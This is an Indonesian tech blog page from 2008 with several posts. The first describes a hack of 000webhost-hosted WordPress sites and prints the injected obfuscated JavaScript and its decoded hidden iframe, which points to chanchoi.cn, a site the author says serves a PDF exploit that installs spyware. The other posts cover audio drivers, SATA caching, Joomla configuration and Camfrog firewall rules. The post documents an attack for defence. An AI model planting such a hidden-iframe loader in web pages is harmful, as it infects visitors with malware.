30.11.08

Attack yang dilakukan chanchoi.cn

attack yang dilakukan oleh web chanchoi.cn juga saya alami seminggu yang lalu pada salah satu blog saya http://dafiex.site88.net. Pertama kali terpikirkan kalau bugs terdapat pada blog saya yang menggunakan machine wordpress tersebut, sehingga attacker berhasil melakukan injeksi javascript pada halaman index.php yang merupakan index dari blog bermachine WP yang saya gunakan. Tetapi pendapat saya ternyata salah, korban attacker adalah sebagian besar merupakan member dari 000webhost.com dan dapat di simpulkan bahwa kebocoran terdapat pada system 000webhost. Pendapat saya ini semakin diperkuat dengan kejadian yang sama pada domain saya yang berbeda pada hosting 000webhost, script injection juga terdapat menempel pada halaman index. Sempat panik juga, walaupun blog tersebut tidak ada apa-apanya.. :D dan akhirnya saya putuskan untuk melakukan upgrade pada blog tersebut dengan versi terbaru dari wordpress yaitu versi 2.6. Dibawah ini adalah script yang di gunakan attacker tersebut dalam code yang masih terencrypt :


<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
?<html><body onload="function a0(s){b='';for(i=0;i<s.length;i+=4>>1)b+=s.charAt(i);return b;}document.write(a0('\074u\x64n\151k\x76n\040o\x73w\164n\x79 \154o\x65b\075f\x22u\166s\x69c\163a\x69t\142i\x69o\154n\x69u\164n\x79k\072n\x68o\151w\x64n\144 \x65o\156b\x22f\076u\x3cs\151c\x66a\162t\x61i\155o\x65n\040u\x73n\162k\x63n\075o\x22w\150n\x74 \164o\x70b\072f\x2fu\057s\x63c\150a\x61t\156i\x63o\150n\x6fu\151n\x2ek\143n\x6eo\057w\x69n\156 \x64o\145b\x78f\056u\x70s\150c\x70a\042t\x20i\166o\x69n\163u\x69n\142k\x69n\154o\x69w\164n\x79 \072o\x68b\151f\x64u\144s\x65c\156a\x20t\167i\x69o\144n\x74u\150n\x3dk\061n\x30o\060w\x20n\150 \x65o\151b\x67f\150u\x74s\075c\x38a\060t\x3ei\074o\x2fn\151u\x66n\162k\x61n\155o\x65w\076n\x3c \057o\x64b\151f\x76u\076s'));"</body></html>>


hasil decode :


<div style="visibility:hidden"><iframe src="http://chanchoi.cn/index.php" visibility:hidden width=100 height=80></iframe></div>


kejadian ini juga di alami oleh salah satu rekan saya di nangkacomm, disebutkan juga hal serupa di forum 000webhost dan menurut informasi dari forum tersebut admin 000webhost telah melakukan blocking terhadap web chanchoi.net. Hari ini di sebutkan bahwa system 000webhost sudah kembali bekerja dengan normal pada halaman login member, yah semoga saja patching sudah dilakukan dengan benar :) .Mengenai efek dari script yang telah mereka injeksi pada system adalah membuat sebuah frame hidden yang mengarah pada sebuah document PDF dimana didalam file PDF tersebut terdapat script attack untuk adobe acrobat reader yang pada akhirnya system operasi kita (windows only) akan melakukan download program dari mereka, program ini biasa di sebut spyware/maleware. Untuk antisipasinya, antivirus norton sudah mengenali spyware ini seperti yang mereka kabarkan pada halaman "https://safeweb.norton.com/report/show?name=chanchoi.cn". dan juga sebaiknya anda update acrobat reader anda dengan versi terbarunya untuk menghindari hal yang tidak diinginkan. Untuk penggunaan browser sendiri sudah saya coba pada firefox versi 3.0.4 dan sudah dapat mendeteksi situs chanchoi sebagai situs attack dengan adanya pesan alert "The site at chanchoi.cn has been reported as an attack site and has been blocked based on your security preferences", tapi security dari sisi browser tidaklah 100% aman karena browser hanya mengenali url dari situs saja! sementara file attack tersebut bisa saja dipindahkan ke domain yang berbeda.
Posted by at No comments:
Labels: ,

23.11.08

Windows XP driver audio compaq presario V3000

Driver audio windows XP buat compaq presario v3000
Buat sobatku yang sedang bermasalah dengan laptop presario barunya (compaq presario v3000-proc intel dualcore), silahkan download driver audionya di sini :

Pertama, silahkan update dulu Microsoft Corporation QFE (KB835221) agar support UAA bus driver HD audio. downoad di sini size(12MB)

Selanjutnya download driver audionya :

Conexant High Definition Audio Driver size (1MB)

Microsoft Universal Audio Architecture (UAA) Bus Driver for High Definition Audio (sp33566) size(54 MB)

Silahkan install Conexant High Definition Audio Driver nya terlebih dahulu. Untuk driver lainya silahkan cek disini.
Posted by at No comments:
Labels:

18.11.08

Mempercepat kinerja hardisk sata vista

Komputer Tips,

Sebuah trik untuk mempercepat kinerja hardisk SATA pada windows vista dapat di lakukan dengan cara meningkatkan fitur penulisan pada cachenya. Secara default fitur ini belum aktiv pada saat installasi windows vista, untuk mengaktivkan fitur tersebut anda bisa melakukannya melalui device manager dengan cara sbb:

  1. Buka command prompt, ketik devmgmt.msc
  2. Pilih hardisk SATA anda, kemudian klik kanan dan pilih properties
  3. Klik pada tab Policies
  4. Pilih opsi Enable write caching on the disk dan Enable advance performance
  5. Klik OK


Selamat mencoba..

fcknmysep@yahoo.com.sg-http://folderblog.blogspot.com
Posted by at No comments:
Labels:

4.11.08

Configurasi joomla pada webhosting

Configurasi joomla pada hosting internet, salah seorang teman saya memiliki kasus sebagai berikut. Dia merancang sebuah web menggunakan joomla cms dan melakukan installasi pada localhost, setelah web terselesaikan tiba waktunya untuk melakukan upload ke webhosting dengan tujuan agar webnya bisa online dan dapat di akses melalui line internet. setelah selesai upload dan melakukan percobaan web, terdapat error mengenai koneksi database. berikut adalah solusinya :
- edit file configuration.php yang terdapat dalam directory joomla anda.
- silahkan sesuaikan user database, host, nama database, dan password database sesuai dengan configurasi pada hostingan anda. di bawah ini merupakan contoh file configuration.php dari localhost dan setelah di upload pada webhosting serta bagian yang perlu diedit yang telah saya tandai dengan huruf tebal.


configuration.php pada localhost


<?php
class JConfig {
var $offline = '0';
var $editor = 'jce';
var $list_limit = '20';
var $helpurl = 'http://help.joomla.org';
var $debug = '0';
var $debug_lang = '0';
var $sef = '0';
var $sef_rewrite = '0';
var $sef_suffix = '0';
var $feed_limit = '10';
var $secret = 'Qn2TwXSaHH5EcagQ';
var $gzip = '0';
var $error_reporting = '-1';
var $xmlrpc_server = '0';
var $log_path = 'C:\\wamp\\www\\www.namaSitus.com\\logs';
var $tmp_path = 'C:\\wamp\\www\\www.namaSitus.com\\tmp';
var $live_site = '';
var $offset = '7';
var $caching = '0';
var $cachetime = '15';
var $cache_handler = 'file';
var $memcache_settings = array();
var $ftp_enable = '0';
var $ftp_host = '127.0.0.1';
var $ftp_port = '21';
var $ftp_user = '';
var $ftp_pass = '';
var $ftp_root = '';
var $dbtype = 'mysql';
var $host = 'localhost';
var $user = 'root';
var $db = 'namaDatabase';
var $dbprefix = 'jos_';
var $mailer = 'mail';
var $mailfrom = 'admin@yahoo.com';
var $fromname = 'www.namaSitus.com';
var $sendmail = '/usr/sbin/sendmail';
var $smtpauth = '0';
var $smtpuser = '';
var $smtppass = '';
var $smtphost = 'localhost';
var $MetaAuthor = '0';
var $MetaTitle = '0';
var $lifetime = '15';
var $session_handler = 'database';
var $password = 'passwordDatabase';
var $sitename = 'www.namaSitus.com';
var $MetaDesc = 'Joomla! - the dynamic portal engine and content management system';
var $MetaKeys = 'joomla, Joomla';
var $offline_message = 'This site is down for maintenance. Please check back again soon.';
}
?>


configuration.php pada web hosting


<?php
class JConfig {
var $offline = '0';
var $editor = 'jce';
var $list_limit = '20';
var $helpurl = 'http://help.joomla.org';
var $debug = '0';
var $debug_lang = '0';
var $sef = '0';
var $sef_rewrite = '0';
var $sef_suffix = '0';
var $feed_limit = '10';
var $secret = 'Qn2TwXSaHH5EcagQ';
var $gzip = '0';
var $error_reporting = '-1';
var $xmlrpc_server = '0';
var $log_path = 'home\\fcknmysep\\public_html\\logs';
var $tmp_path = 'home\\fcknmysep\\public_html\\tmp';
var $live_site = '';
var $offset = '7';
var $caching = '0';
var $cachetime = '15';
var $cache_handler = 'file';
var $memcache_settings = array();
var $ftp_enable = '0';
var $ftp_host = '127.0.0.1';
var $ftp_port = '21';
var $ftp_user = '';
var $ftp_pass = '';
var $ftp_root = '';
var $dbtype = 'mysql';
var $host = 'mysq.nangkacomm.net';
var $user = 'root';
var $db = 'fcknmysep_database';
var $dbprefix = 'jos_';
var $mailer = 'mail';
var $mailfrom = 'admin@yahoo.com';
var $fromname = 'www.namaSitus.com';
var $sendmail = '/usr/sbin/sendmail';
var $smtpauth = '0';
var $smtpuser = '';
var $smtppass = '';
var $smtphost = 'nangkacomm.net';
var $MetaAuthor = '0';
var $MetaTitle = '0';
var $lifetime = '15';
var $session_handler = 'database';
var $password = 'passwordku';
var $sitename = 'www.namaSitus.com';
var $MetaDesc = 'Joomla! - the dynamic portal engine and content management system';
var $MetaKeys = 'joomla, Joomla';
var $offline_message = 'This site is down for maintenance. Please check back again soon.';
}
?>

keterangan :
- var $log_path = 'home\\fcknmysep\\public_html\\logs'; adalah directory logs pada webhosting
- var $tmp_path = 'home\\fcknmysep\\public_html\\tmp'; adalah directory tmp pada webhosting
- var $host = 'mysq.nangkacomm.net'; adalah host database pada webhosting
- var $user = 'root'; adalah user database pada webhosting
- var $db = 'fcknmysep_database'; adalah nama database pada webhosting
- var $smtphost = 'nangkacomm.net'; adalah url smpt dari web, ganti nangkacomm.net dengan url situs anda. contoh: situsaanda.com .SMTP berfungsi sebagai protokol pengirim email.
- var $password = 'passwordku'; adalah password database pada webhosting

Silahkan anda ganti entry dari huruf tebal di atas sesuai configurasi pada webhostingan anda.


Judul artikel: merubah configurasi joomla cms pada webhosting
penulis: fcknmysep@yahoo.com.sg - http://folderblog.blogspot.com
Posted by at 1 comment:
Labels:

3.11.08

Block ip dan port camfrog messenger

Block ip dan port camfrog, Akhir-akhir ini populernya camfrog ,sebuah alternatif messenger yang berbasis text dan video memiliki efek yang kurang bagus bagi trafic data di jaringan internet. Padatnya trafic karena banyaknya cliet yang menggunakan messenger video ini akan sangat terasa apabila bandwidth kita pas-pasan, dan sebagian dari admin networking (termasuk teman saya) akhirnya memutuskan untuk memblock paket data dari software camfrog ini. Dibawah ini dapat di lihat log dari aktivitas software client camfrog messenger tersebut :

[06:41] Camfrog Video Chat.exe - login.camfrog.com:2778 open
[06:41] Camfrog Video Chat.exe - 66.77.107.71:2112 open
[06:41] Camfrog Video Chat.exe - login.camfrog.com:2778 close, 216 bytes sent, 236 bytes received
[06:42] Camfrog Video Chat.exe - adv.camfrog.com:80 open
[06:42] Camfrog Video Chat.exe - adserving.cpxinteractive.com:80 open
[06:42] Camfrog Video Chat.exe - adv.camfrog.com:80 close, 211 bytes sent, 168 bytes received
[06:42] Camfrog Video Chat.exe - adserving.cpxinteractive.com:80 close, 424 bytes sent, 4713 bytes (4.60 KB) received
[06:42] Camfrog Video Chat.exe - adv.camfrog.com:80 open
[06:42] Camfrog Video Chat.exe - ad.yieldmanager.com:80 open
[06:42] Camfrog Video Chat.exe - adv.camfrog.com:80 close, 213 bytes sent, 136 bytes received
[06:42] Camfrog Video Chat.exe - ad.yieldmanager.com:80 close, 589 bytes sent, 1860 bytes (1.81 KB) received
[06:42] Camfrog Video Chat.exe - adv.camfrog.com:80 open
[06:42] Camfrog Video Chat.exe - adserving.cpxinteractive.com:80 open
[06:42] Camfrog Video Chat.exe - adv.camfrog.com:80 close, 295 bytes sent, 2987 bytes (2.91 KB) received
[06:42] Camfrog Video Chat.exe - adserving.cpxinteractive.com:80 close, 328 bytes sent, 385 bytes received
[06:42] Camfrog Video Chat.exe - ad.yieldmanager.com:80 open
[06:42] Camfrog Video Chat.exe - ad.yieldmanager.com:80 close, 724 bytes sent, 684 bytes received
[06:42] Camfrog Video Chat.exe - adserving.cpxinteractive.com:80 open
[06:42] Camfrog Video Chat.exe - adserving.cpxinteractive.com:80 close, 328 bytes sent, 385 bytes received
[06:42] Camfrog Video Chat.exe - ad.yieldmanager.com:80 open
[06:42] Camfrog Video Chat.exe - ad.yieldmanager.com:80 close, 789 bytes sent, 731 bytes received
[06:42] Camfrog Video Chat.exe - 74.55.217.80:6005 open
[06:44] Camfrog Video Chat.exe - 74.55.217.80:6005 close, 283 bytes sent, 644 bytes received

Untuk blocking software ini anda bisa block ip dan domain berikut menggunakan squid maupun iptables:
- login.camfrog.com
- 66.77.107.71
- 63.236.61.148
- 74.55.217.80
Untuk port yang di block adalah port 2778, 6005 dan 2112.
Berikut adalah contoh blocking paket out/floward menggunakan server mikrotik dan linux.

MIKROTIK
/ip firewall filter add chain=forward dst-address=66.77.107.71 action=drop disable=no
/ip firewall filter add chain=forward dst-address=63.236.61.148 action=drop disable=no
/ip firewall filter add chain=forward dst-address=74.55.217.80 action=drop disable=no

LINUX
/sbin/iptables -A OUTGOING -d 66.77.107.71 -j DROP
/sbin/iptables -A OUTGOING -d 63.236.61.148 -j DROP
/sbin/iptables -A OUTGOING -d 74.55.217.80 -j DROP


Judul artikel : Block camfrog messenger
Penulis : fcknmysep@yahoo.com.sg - http://folderblog.blogspot.com
Posted by at 10 comments:
Labels: , , , ,
Subscribe to: Posts (Atom)